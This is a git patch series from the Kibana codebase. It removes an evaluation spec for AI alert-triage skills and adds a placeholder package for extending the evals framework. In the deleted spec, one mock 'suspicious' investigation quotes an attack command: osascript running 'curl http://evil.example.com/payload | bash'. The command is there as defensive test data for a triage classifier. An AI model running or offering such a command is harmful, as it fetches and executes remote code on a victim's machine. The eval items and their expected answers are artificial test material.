+++ b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
@@ -9,8 +9,6 @@
 
 // Needed for Scout tests dependent on .peggy grammar files (`@kbn/tinymath`)
 import './peggy_setup';
-// Needed for packages that import .text files (e.g. @kbn/evals LLM prompt templates)
-import './dot_text_setup';
 
 // Config and utilities
 export { createPlaywrightConfig } from './config';
diff --git a/src/setup_node_env/exit_on_warning.js b/src/setup_node_env/exit_on_warning.js
index 379155f07ce6f..40d78071f9a4a 100644
--- a/src/setup_node_env/exit_on_warning.js
+++ b/src/setup_node_env/exit_on_warning.js
@@ -107,11 +107,6 @@ var IGNORE_WARNINGS = [
     messageContains:
       'Keys with collection values will be stringified due to JS Object restrictions',
   },
-  // Playwright workers set FORCE_COLOR while NO_COLOR may also be set
-  {
-    name: 'Warning',
-    messageContains: "'NO_COLOR' env is ignored due to the 'FORCE_COLOR' env being set",
-  },
 ];
 
 if (process.noProcessWarnings !== true) {
diff --git a/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts b/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
deleted file mode 100644
index 0c7427cf52d58..0000000000000
--- a/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
+++ /dev/null
@@ -1,315 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0; you may not use this file except in compliance with the Elastic License
- * 2.0.
- */
-
-import { tags } from '@kbn/scout';
-import { createHash } from 'crypto';
-import { evaluate as base } from '../../src/evaluate';
-import type { EvaluateDataset } from '../../src/evaluate_dataset';
-import { createEvaluateDataset } from '../../src/evaluate_dataset';
-
-const AGENTS_API_BASE_PATH = '/api/agent_builder/agents';
-const SKILLS_API_BASE_PATH = '/api/agent_builder/skills';
-
-const TRIAGE_SKILL_IDS = [
-  'agentic-alert-triage-l1-investigation',
-  'agentic-alert-triage-l1-triage',
-  'agentic-alert-triage-orchestrator',
-  'agentic-alert-triage-threshold-context',
-  'agentic-alert-triage-l3-review',
-];
-
-const MOCK_ALERT_CONTEXT = [
-  'Alert ID: abc-123-def',
-  'Rule: Suspicious Process Execution via macOS Script',
-  'Severity: high',
-  'Time: 2026-03-18T10:00:00Z',
-  'Agent type: endpoint',
-  'Host: mbp-user1 (host-id-001)',
-  'OS: macos',
-  'User: user1@example.com (user1)',
-  'Source IP: 10.0.0.42',
-  'Process: osascript',
-  'SHA256: a1b2c3d4e5f6...',
-  '',
-  'Rule Description: Detects execution of osascript with suspicious arguments that may indicate social engineering.',
-  'Alert reason: osascript was executed with arguments matching known social engineering patterns on mbp-user1.',
-  'Known false positives: ["IT automation scripts using osascript for legitimate purposes"]',
-].join('\n');
-
-const MOCK_BENIGN_INVESTIGATION = [
-  'Verdict: False Positive',
-  'Assessment: benign',
-  'Summary: The osascript execution was triggered by an IT automation script (Jamf policy) deploying a standard configuration profile.',
-  '',
-  '## Evidence',
-  '- Process command line: osascript -e \'tell application "System Events" to display dialog "Install update?"\'',
-  '- Parent process: jamf (PID 1234), signed by Jamf',
-  '- The Jamf agent on this host has a policy that uses osascript for user-facing dialogs during patch deployment',
-  '- No network connections from the osascript process',
-  '- Host alerts 24h: 0 other alerts on this host',
-  '- Okta: normal login patterns for user1@example.com (1 login, 1 IP, US only)',
-  '',
-  '## Timeline',
-  '- 09:55 — Jamf policy "Q1 Patch Deploy" started on mbp-user1',
-  '- 10:00 — osascript executed by jamf to display update dialog',
-  '- 10:01 — User clicked OK, dialog dismissed',
-].join('\n');
-
-const MOCK_SUSPICIOUS_INVESTIGATION = [
-  'Verdict: True Positive',
-  'Assessment: suspicious',
-  'Summary: The osascript execution does not match any known Jamf or IT automation pattern and includes obfuscated arguments.',
-  '',
-  '## Evidence',
-  '- Process command line: osascript -e \'do shell script "curl http://evil.example.com/payload | bash"\'',
-  '- Parent process: Terminal.app (PID 5678), user-initiated',
-  '- No matching Jamf policies on this host',
-  '- The curl target (evil.example.com) resolves to an IP associated with known C2 infrastructure',
-  '- Host alerts 24h: 3 other alerts — "Suspicious Network Connection", "Unsigned Binary Execution"',
-  '- Okta: user1@example.com logged in from 2 distinct IPs in 2 countries (US, RU) in the last 24h',
-  '',
-  '## Timeline',
-  '- 09:30 — User logged in from unusual IP (RU)',
-  '- 09:45 — Terminal.app opened',
-  '- 10:00 — osascript executed with curl | bash payload',
-  '- 10:02 — Outbound connection to evil.example.com detected',
-].join('\n');
-
-const evaluate = base.extend<{ evaluateDataset: EvaluateDataset }, {}>({
-  evaluateDataset: [
-    ({ chatClient, evaluators, executorClient, traceEsClient, log }, use) => {
-      use(
-        createEvaluateDataset({
-          chatClient,
-          evaluators,
-          executorClient,
-          traceEsClient,
-          log,
-        })
-      );
-    },
-    { scope: 'test' },
-  ],
-});
-
-evaluate.describe(
-  'Agentic Alert Triage - Skill Migration Evals',
-  { tag: tags.stateful.classic },
-  () => {
-    let triageAgentId: string | undefined;
-
-    evaluate.beforeAll(async ({ fetch, log, connector }) => {
-      // Verify that the triage skills exist (they should be pre-imported)
-      for (const skillId of TRIAGE_SKILL_IDS) {
-        try {
-          await fetch(`${SKILLS_API_BASE_PATH}/${encodeURIComponent(skillId)}`, {
-            version: '2023-10-31',
-          });
-          log.debug(`Skill verified: ${skillId}`);
-        } catch {
-          log.warning(`Skill ${skillId} not found — import it before running this suite`);
-        }
-      }
-
-      // Create a dedicated eval agent with the triage skills attached
-      const connectorHash = createHash('sha256').update(connector.id).digest('hex').slice(0, 8);
-      const ts = Date.now().toString(36);
-      const agentId = `eval_triage_${connectorHash}_${ts}`;
-
-      await fetch(AGENTS_API_BASE_PATH, {
-        method: 'POST',
-        version: '2023-10-31',
-        body: JSON.stringify({
-          id: agentId,
-          name: 'Eval: Agentic Alert Triage',
-          description: 'Evaluation agent for triage skill migration testing.',
-          configuration: {
-            enable_elastic_capabilities: true,
-            skill_ids: TRIAGE_SKILL_IDS,
-            tools: [],
-          },
-        }),
-      });
-
-      triageAgentId = agentId;
-      log.info(`Created eval agent: ${agentId}`);
-    });
-
-    evaluate.afterAll(async ({ fetch, log }) => {
-      if (triageAgentId) {
-        try {
-          await fetch(`${AGENTS_API_BASE_PATH}/${encodeURIComponent(triageAgentId)}`, {
-            method: 'DELETE',
-            version: '2023-10-31',
-          });
-          log.debug(`Deleted eval agent: ${triageAgentId}`);
-        } catch (e) {
-          log.warning(
-            `Failed to delete eval agent "${triageAgentId}": ${
-              e instanceof Error ? e.message : String(e)
-            }`
-          );
-        }
-      }
-    });
-
-    evaluate(
-      'L1 investigation produces structured Markdown with verdict',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: l1-investigation',
-            description:
-              'Validates that the L1 investigation skill produces a Markdown report with Verdict, Assessment, and Summary.',
-            examples: [
-              {
-                input: {
-                  question: `Investigate this security alert and return your findings in Markdown.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
-                },
-                output: {
-                  expected:
-                    'A Markdown investigation report containing Verdict, Assessment, and Summary fields, followed by evidence and timeline sections.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'L1 triage classifies benign alert correctly',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: l1-triage-benign',
-            description:
-              'Validates that the agent classifies a clearly benign alert as benign with high confidence.',
-            examples: [
-              {
-                input: {
-                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_BENIGN_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
-                },
-                output: {
-                  expected:
-                    'JSON output with assessment "benign" and confidence "high", since the investigation clearly concludes this is a false positive from IT automation.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'L1 triage classifies suspicious alert correctly',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: l1-triage-suspicious',
-            description:
-              'Validates that the agent classifies a suspicious alert as suspicious or malicious.',
-            examples: [
-              {
-                input: {
-                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_SUSPICIOUS_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
-                },
-                output: {
-                  expected:
-                    'JSON output with assessment "suspicious" or "malicious" since the investigation shows obfuscated osascript with curl to known C2, multi-country logins, and correlated alerts.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'Orchestrator produces full triage report with all sections',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: orchestrator-full-flow',
-            description:
-              'Validates the orchestrator skill produces a comprehensive report with L1, L2, and L3 sections.',
-            examples: [
-              {
-                input: {
-                  question: `Orchestrate the full triage in one run for this alert.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\nSignals index: .siem-signals-infosec-detections`,
-                },
-                output: {
-                  expected:
-                    'A structured Markdown report containing L1 Investigation with Verdict/Assessment/Summary, L1 Triage JSON with assessment/confidence/reasoning, L2 Findings with domain-specific analysis, and L3 Review with final assessment.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'Orchestrator handles benign alert with appropriate assessment',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: orchestrator-benign',
-            description:
-              'Validates the orchestrator correctly identifies a benign alert given clear false-positive context.',
-            examples: [
-              {
-                input: {
-                  question: `Orchestrate the full triage for this alert. The workstation lookup shows it is owned by IT admin and the process is part of standard Jamf deployment.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\n=== WORKSTATION OWNER ===\nuser1@example.com, IT Admin, managed by Jamf\n\n=== ENRICHMENT ===\nHost alerts 24h: 0 other alerts\nOkta: 1 login from expected office IP\nCorrelated alerts 72h: none`,
-                },
-                output: {
-                  expected:
-                    'Report concludes benign/false positive with high confidence. The triage JSON should show assessment "benign". The review should recommend closing the alert.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-  }
-);

From 42500c20ae0ea32ea31c15ff648f91e7fcbd4646 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Fri, 20 Mar 2026 09:14:04 +0100
Subject: [PATCH 04/15] feat(evals): create @kbn/evals-extensions foundation
 package
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

This establishes the structure for advanced evaluation capabilities
ported from cursor-plugin-evals and serves as the home for Phases 3-5
of the evals roadmap.

## Architecture

The package is designed to be completely independent from @kbn/evals:

```
Evaluation Suites
     ├──> @kbn/evals (core)
     └──> @kbn/evals-extensions (advanced features)
              └──> depends on @kbn/evals
```

**Dependency Rule:**
- ✅ kbn-evals-extensions CAN import from kbn-evals
- ❌ kbn-evals MUST NOT import from kbn-evals-extensions

## This PR

**What's included:**
- Package structure (package.json, kibana.jsonc, tsconfig.json)
- Placeholder exports (no functional changes)
- Test infrastructure (5 passing tests)
- Comprehensive documentation

**What's NOT included:**
- No functional features (placeholder exports only)
- No changes to @kbn/evals package
- No changes to evaluation suite behavior

## Validation

✅ Bootstrap completed successfully
✅ Type check passed
✅ All tests passing (5/5)
✅ ESLint passed
✅ No circular dependencies
✅ check_changes.ts passed

## Roadmap

This foundation enables parallel development of:
- PR #2: Cost tracking & metadata enrichment
- PR #3: Dataset management utilities
- PR #4: Safety evaluators (toxicity, PII, bias, etc.)
- PR #5: UI components (run comparison, example explorer)
- PR #6: DX enhancements (watch mode, caching, parallel)
- PR #7: Advanced analytics
- PR #8: A/B testing & active learning
- PR #9: Human-in-the-loop workflows
- PR #10: IDE integration

## Related Issues

- Closes part of #257821 (Epic: Extend @kbn/evals)
- Enables #257823 (Phase 2: CI Quality Gates)
- Enables #257824 (Phase 3: Red-Teaming)
- Enables #257825 (Phase 4: Lens Dashboards)
- Enables #257826 (Phase 5: Auto-Generation)
- Addresses #255820 (kbn/evals <-> Agent Builder completeness)

Co-Authored-By: Claude Sonnet 4.5 (1M context) <noreply@anthropic.com>
---
 .github/CODEOWNERS                            |   1 +
 package.json                                  |   1 +
 tsconfig.base.json                            |   2 +
 .../shared/kbn-evals-extensions/.gitignore    |  17 ++
 .../shared/kbn-evals-extensions/README.md     | 211 ++++++++++++++++++
 .../__tests__/package.test.ts                 |  54 +++++
 .../shared/kbn-evals-extensions/index.ts      |  82 +++++++
 .../kbn-evals-extensions/jest.config.js       |  12 +
 .../shared/kbn-evals-extensions/kibana.jsonc  |   6 +
 .../shared/kbn-evals-extensions/package.json  |  22 ++
 .../shared/kbn-evals-extensions/src/index.ts  |  14 ++
 .../kbn-evals-extensions/src/types/index.ts   |  47 ++++
 .../kbn-evals-extensions/src/utils/index.ts   |  19 ++
 .../shared/kbn-evals-extensions/tsconfig.json |  27 +++
 yarn.lock                                     |  12 +
 15 files changed, 527 insertions(+)
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/README.md
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/package.json
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json

diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 62e2aa5582bbc..25d013e6e8338 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -3256,3 +3256,4 @@ x-pack/solutions/observability/plugins/synthetics/server/saved_objects/synthetic
 ####
 ## These rules are always last so they take ultimate priority over everything else
 ####
+/x-pack/platform/packages/shared/kbn-evals-extensions/ @elastic/kibana-obs-ai
diff --git a/package.json b/package.json
index c5a76cc61104f..f4c5c22a4b341 100644
--- a/package.json
+++ b/package.json
@@ -626,6 +626,7 @@
     "@kbn/eui-provider-dev-warning": "link:src/platform/test/plugin_functional/plugins/eui_provider_dev_warning",
     "@kbn/eval-kql": "link:src/platform/packages/shared/kbn-eval-kql",
     "@kbn/evals-common": "link:x-pack/platform/packages/shared/kbn-evals-common",
+    "@kbn/evals-extensions": "link:x-pack/platform/packages/shared/kbn-evals-extensions",
     "@kbn/evals-plugin": "link:x-pack/platform/plugins/shared/evals",
     "@kbn/event-annotation-common": "link:src/platform/packages/shared/kbn-event-annotation-common",
     "@kbn/event-annotation-components": "link:src/platform/packages/shared/kbn-event-annotation-components",
diff --git a/tsconfig.base.json b/tsconfig.base.json
index 6134a34a01b3c..dc0562f6c43af 100644
--- a/tsconfig.base.json
+++ b/tsconfig.base.json
@@ -1136,6 +1136,8 @@
       "@kbn/evals/*": ["x-pack/platform/packages/shared/kbn-evals/*"],
       "@kbn/evals-common": ["x-pack/platform/packages/shared/kbn-evals-common"],
       "@kbn/evals-common/*": ["x-pack/platform/packages/shared/kbn-evals-common/*"],
+      "@kbn/evals-extensions": ["x-pack/platform/packages/shared/kbn-evals-extensions"],
+      "@kbn/evals-extensions/*": ["x-pack/platform/packages/shared/kbn-evals-extensions/*"],
       "@kbn/evals-phoenix-executor": ["x-pack/platform/packages/shared/kbn-evals-phoenix-executor"],
       "@kbn/evals-phoenix-executor/*": ["x-pack/platform/packages/shared/kbn-evals-phoenix-executor/*"],
       "@kbn/evals-plugin": ["x-pack/platform/plugins/shared/evals"],
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore b/x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore
new file mode 100644
index 0000000000000..c3d694ce14f84
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore
@@ -0,0 +1,17 @@
+# Build output
+target/
+*.js
+!jest.config.js
+*.d.ts
+tsconfig.tsbuildinfo
+
+# Dependencies
+node_modules/
+
+# IDE
+.vscode/
+.idea/
+
+# OS
+.DS_Store
+Thumbs.db
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/README.md b/x-pack/platform/packages/shared/kbn-evals-extensions/README.md
new file mode 100644
index 0000000000000..4c4e87be6bcb2
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/README.md
@@ -0,0 +1,211 @@
+# @kbn/evals-extensions
+
+Advanced evaluation capabilities for `@kbn/evals` - **standalone extensions package**.
+
+## Purpose
+
+This package extends `@kbn/evals` with advanced features ported from [cursor-plugin-evals](https://github.com/patrykkopycinski/cursor-plugin-evals) and serves as the home for Phases 3-5 of the evals roadmap.
+
+## Architecture: Independent Package Design
+
+**Critical principle:** This package is designed to be **completely independent** from `@kbn/evals`.
+
+```
+┌─────────────────────────────────────────────────────┐
+│              Evaluation Suites                      │
+│  (agent-builder, obs-ai-assistant, security)        │
+└──────────────────┬──────────────────────────────────┘
+                   │
+        ┌──────────┴──────────┐
+        │                     │
+        ▼                     ▼
+┌──────────────────┐   ┌─────────────────────────────┐
+│   @kbn/evals     │   │   @kbn/evals-extensions     │
+│   (core)         │   │   (advanced features)       │
+│                  │   │                             │
+│ ✅ Evaluators    │   │ ✅ Safety evaluators        │
+│ ✅ Scout/PW      │   │ ✅ Cost tracking            │
+│ ✅ ES export     │   │ ✅ Dataset management       │
+│ ✅ Stats         │   │ ✅ UI components            │
+│ ✅ CLI basics    │   │ ✅ Watch mode               │
+│                  │   │ ✅ A/B testing              │
+│ ❌ NO imports    │   │ ✅ Human-in-the-loop        │
+│    from ext ─────┼───┼──X                          │
+│                  │   │                             │
+└──────────────────┘   └──────────┬──────────────────┘
+                                  │
+                                  │ depends on
+                                  ▼
+                       ┌──────────────────┐
+                       │   @kbn/evals     │
+                       │   (types, utils) │
+                       └──────────────────┘
+```
+
+**Dependency Rules:**
+- ✅ `kbn-evals-extensions` CAN import from `kbn-evals`
+- ❌ `kbn-evals` MUST NOT import from `kbn-evals-extensions`
+- ✅ Evaluation suites can use both packages independently
+
+## Features
+
+### Current Status: Foundation (PR #1)
+- ✅ Package structure established
+- ✅ Build configuration
+- ✅ Test infrastructure
+- ❌ No functional features yet (placeholder exports only)
+
+### Roadmap
+
+#### **PR #2: Cost Tracking & Metadata** (Weeks 2-3)
+- Token-based cost calculation
+- Hyperparameter tracking (temperature, top_p, etc.)
+- Environment snapshots (Kibana/ES versions, plugins)
+- Run tagging and annotations
+
+#### **PR #3: Dataset Management** (Weeks 4-6)
+- Dataset versioning (semantic versioning)
+- Schema validation (Zod-based)
+- Deduplication (similarity-based)
+- Merging and splitting utilities
+- Filtering and statistics
+
+#### **PR #4: Safety Evaluators** (Weeks 7-10)
+- Toxicity detection
+- PII detection
+- Bias detection
+- Hallucination detection
+- Refusal testing
+- Content moderation
+
+#### **PR #5: UI Components** (Weeks 11-16)
+- Run comparison viewer (side-by-side diff)
+- Example explorer (worst-case analysis)
+- Score distribution charts
+- Integration with evals Kibana plugin
+
+#### **PR #6: DX Enhancements** (Weeks 17-21)
+- Watch mode (auto-rerun on changes)
+- Parallel execution (multi-suite concurrency)
+- Result caching (skip unchanged examples)
+- Incremental evaluation (delta-only runs)
+- Interactive mode (step-through debugging)
+- Dry-run mode (validation without execution)
+
+#### **PR #7: Advanced Analytics** (Weeks 22-24)
+- Confidence intervals (bootstrapping)
+- Outlier detection (Z-score, IQR, Isolation Forest)
+- Failure clustering (K-means, hierarchical)
+- Error taxonomy
+- Ensemble evaluation
+- Calibration analysis
+
+#### **PR #8: A/B Testing & Active Learning** (Weeks 25-29)
+- A/B testing framework with statistical tests
+- Bandit algorithms (epsilon-greedy, UCB, Thompson sampling)
+- Active learning (uncertainty and diversity sampling)
+
+#### **PR #9: Human-in-the-Loop** (Weeks 30-35)
+- Review queue UI
+- Annotation interface
+- Assignment workflow
+- Inter-rater reliability
+- Conflict resolution
+
+#### **PR #10: IDE Integration** (Weeks 36-39)
+- VS Code extension
+- Cursor skills for eval authoring
+- AI-assisted dataset creation
+
+## Usage
+
+### Opting In to Extensions
+
+Evaluation suites import extensions explicitly:
+
+```typescript
+// Example: agent-builder evaluation suite
+import { evaluate } from '@kbn/evals';
+import {
+  createToxicityEvaluator,
+  createPiiDetector,
+  createBiasEvaluator,
+  costTracker,
+  watchMode
+} from '@kbn/evals-extensions';
+
+evaluate('security test', async ({ executorClient }) => {
+  // Mix core and extension evaluators
+  await executorClient.runExperiment(
+    { dataset, task },
+    [
+      ...createCorrectnessEvaluators(),     // core kbn/evals
+      createToxicityEvaluator(),            // extension
+      createPiiDetector(),                  // extension
+    ]
+  );
+
+  // Use extension features
+  await costTracker.logRunCost(executorClient.getRunId());
+});
+```
+
+### Feature Flags
+
+Extensions use environment variables for opt-in behavior:
+
+```bash
+# Enable watch mode
+KBN_EVALS_EXT_WATCH_MODE=true node scripts/evals run --suite <id>
+
+# Enable parallel execution
+KBN_EVALS_EXT_PARALLEL=true node scripts/evals run --suite <id>
+
+# Enable result caching
+KBN_EVALS_EXT_CACHE=true node scripts/evals run --suite <id>
+```
+
+## Why a Separate Package?
+
+1. **Clear boundaries** - Extensions don't pollute core framework
+2. **Independent evolution** - Iterate without affecting core
+3. **Optional adoption** - Suites choose which features to use
+4. **Parallel development** - Teams work without conflicts
+5. **Easier testing** - Integration tests isolated
+6. **Future migration** - Can promote mature features to core later
+
+## Vision Alignment
+
+All features follow principles from "Future of @kbn/evals":
+- **Trace-first**: Leverage OTel traces when applicable
+- **Elastic-native**: No external dependencies
+- **Shared layer**: Provide composable primitives
+- **Code-defined**: Datasets versioned in code
+
+## Development
+
+### Running Tests
+
+```bash
+yarn test:jest --testPathPattern=kbn-evals-extensions
+```
+
+### Type Checking
+
+```bash
+yarn test:type_check --project x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
+```
+
+### Linting
+
+```bash
+node scripts/eslint --fix x-pack/platform/packages/shared/kbn-evals-extensions
+```
+
+## Contributing
+
+See individual feature directories for contribution guidelines. All PRs should:
+- Follow Kibana code standards
+- Include unit tests
+- Update this README with new exports
+- Maintain independence from `@kbn/evals` core
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
new file mode 100644
index 0000000000000..3415c9e23dc3a
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
@@ -0,0 +1,54 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Basic package health checks for @kbn/evals-extensions
+ */
+
+import { EVALS_EXTENSIONS_VERSION } from '..';
+
+describe('@kbn/evals-extensions', () => {
+  describe('package structure', () => {
+    it('should export EVALS_EXTENSIONS_VERSION', () => {
+      expect(EVALS_EXTENSIONS_VERSION).toBe('1.0.0');
+    });
+
+    it('should be importable without errors', async () => {
+      await expect(async () => {
+        await import('..');
+      }).resolves.not.toThrow();
+    });
+  });
+
+  describe('dependency isolation', () => {
+    it('should not create circular dependencies with @kbn/evals', async () => {
+      // This test ensures we maintain one-way dependency:
+      // kbn-evals-extensions → depends on → kbn-evals
+      // kbn-evals → MUST NOT depend on → kbn-evals-extensions
+
+      // Both packages should be importable
+      const evalsExtensions = await import('..');
+      const kbnEvals = await import('@kbn/evals');
+
+      expect(evalsExtensions).toBeDefined();
+      expect(kbnEvals).toBeDefined();
+
+      // kbn-evals-extensions can use kbn-evals types (verified by compilation)
+      // kbn-evals should have no knowledge of kbn-evals-extensions
+      // This is enforced by TypeScript references in tsconfig.json
+    });
+  });
+
+  describe('exports', () => {
+    it('should re-export core types from @kbn/evals', async () => {
+      // Type exports are verified at compile time
+      // Runtime check just ensures module loads
+      const exports = await import('..');
+      expect(exports).toBeDefined();
+    });
+  });
+});
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/index.ts
new file mode 100644
index 0000000000000..5a82567054db1
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/index.ts
@@ -0,0 +1,82 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * @kbn/evals-extensions - Advanced evaluation capabilities
+ *
+ * This package provides standalone extensions for @kbn/evals.
+ * It does NOT modify the core @kbn/evals package.
+ *
+ * ## Architecture
+ *
+ * Dependency flow:
+ * - ✅ kbn-evals-extensions → imports from → kbn-evals
+ * - ❌ kbn-evals → MUST NOT import from → kbn-evals-extensions
+ *
+ * Evaluation suites can opt-in to extensions by importing directly:
+ *
+ * @example
+ * ```typescript
+ * import { evaluate } from '@kbn/evals';
+ * import { createToxicityEvaluator, costTracker } from '@kbn/evals-extensions';
+ *
+ * evaluate('test', async ({ executorClient }) => {
+ *   await executorClient.runExperiment(
+ *     { dataset, task },
+ *     [createToxicityEvaluator()]  // Extension evaluator
+ *   );
+ *   await costTracker.logRunCost(runId);  // Extension feature
+ * });
+ * ```
+ *
+ * ## Roadmap
+ *
+ * Features are being added incrementally:
+ * - **PR #1**: Foundation (current) - Package setup, no functional changes
+ * - **PR #2**: Cost tracking & metadata
+ * - **PR #3**: Dataset management utilities
+ * - **PR #4**: Safety evaluators (toxicity, PII, bias, etc.)
+ * - **PR #5**: UI components (run comparison, example explorer)
+ * - **PR #6**: DX enhancements (watch mode, caching, parallel execution)
+ * - **PR #7**: Advanced analytics (confidence intervals, outlier detection)
+ * - **PR #8**: A/B testing & active learning
+ * - **PR #9**: Human-in-the-loop workflows
+ * - **PR #10**: IDE integration (VS Code extension, Cursor skills)
+ *
+ * @packageDocumentation
+ */
+
+// Re-export core types from kbn-evals for convenience
+// This allows users to import from one place, but doesn't create reverse dependency
+export type { Evaluator, Example, EvaluationDataset, TaskOutput } from '@kbn/evals';
+
+export type { EvaluationScoreDocument } from '@kbn/evals';
+
+/**
+ * Extension-specific types (to be populated in future PRs)
+ */
+export interface ExtensionConfig {
+  /**
+   * Configuration for extension features
+   * Will be expanded as features are added
+   */
+  placeholder?: string;
+}
+
+/**
+ * Feature exports (to be populated in future PRs)
+ *
+ * Examples of what will be exported:
+ * - export { createToxicityEvaluator } from './src/evaluators/safety/toxicity';
+ * - export { costTracker } from './src/tracking/cost_calculator';
+ * - export { watchMode } from './src/execution/watch_mode';
+ * - export { createABTest } from './src/experimentation/ab_testing/framework';
+ * - export { reviewQueue } from './src/human_review/workflow/review_workflow';
+ */
+
+// Placeholder export to ensure package builds
+export const EVALS_EXTENSIONS_VERSION = '1.0.0';
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js b/x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js
new file mode 100644
index 0000000000000..60bb4e9652f53
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js
@@ -0,0 +1,12 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+module.exports = {
+  preset: '@kbn/test/jest_node',
+  rootDir: '../../../../..',
+  roots: ['<rootDir>/x-pack/platform/packages/shared/kbn-evals-extensions'],
+};
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
new file mode 100644
index 0000000000000..6f03786515b8d
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
@@ -0,0 +1,6 @@
+{
+  "type": "shared-common",
+  "id": "@kbn/evals-extensions",
+  "owner": ["@elastic/kibana-obs-ai"],
+  "description": "Advanced evaluation capabilities for @kbn/evals - standalone extensions package. Home for features ported from cursor-plugin-evals and Phases 3-5 of evals roadmap."
+}
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/package.json b/x-pack/platform/packages/shared/kbn-evals-extensions/package.json
new file mode 100644
index 0000000000000..5513f44c281e0
--- /dev/null
